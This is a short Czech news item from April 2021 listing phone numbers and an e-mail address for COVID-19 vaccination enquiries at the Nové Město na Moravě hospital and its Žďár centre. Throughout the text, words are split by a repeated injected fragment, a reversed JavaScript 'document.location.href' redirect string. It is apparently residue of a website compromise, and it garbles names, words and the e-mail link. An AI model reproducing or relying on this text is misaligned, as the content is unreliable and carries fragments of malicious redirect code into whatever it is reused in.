Rainbow page separator

K informacím o očkování byly vyčleněny dva telefonní kontakty

Pátek, 9. dubna 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Pouze na dvou telefonních číslech jsou od středy 7. dubna posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny informace týkající se očkovaní v očkovacím centru v novoměstské nemocnici i v nedávno zprovozněném centru, které nemocnice zajišťuje ve žďárské spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní hale na Bouchalkách.
Čísla informační linky platí pro obě zmíněná pracoviště, žďárské i novoměstské. Na telefon 566 801 550 je možné volat v pracovní dny – tedy od pondělí do pátku – v době od 7 do 15.30 hodin. Číslo 724 170 788 slouží k posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování informací o očkování proti nemoci COVID-19 a dalších údajů s [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to problematikou spojených, jako je kupříkladu změna termínu očkování, výhradně v sobotu a v neděli, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vždy od 8 do 12 hodin. Dotazy týkající se vakcinace v obou očkovacích centrech je možné směřovat rovněž na kontaktní [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to:info.vakcinace@nnm.cz“>info.vakcinace@nnm.cz.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave-77777-300×224.jpg“ alt=““ width=“300″ height=“224″ /> hdr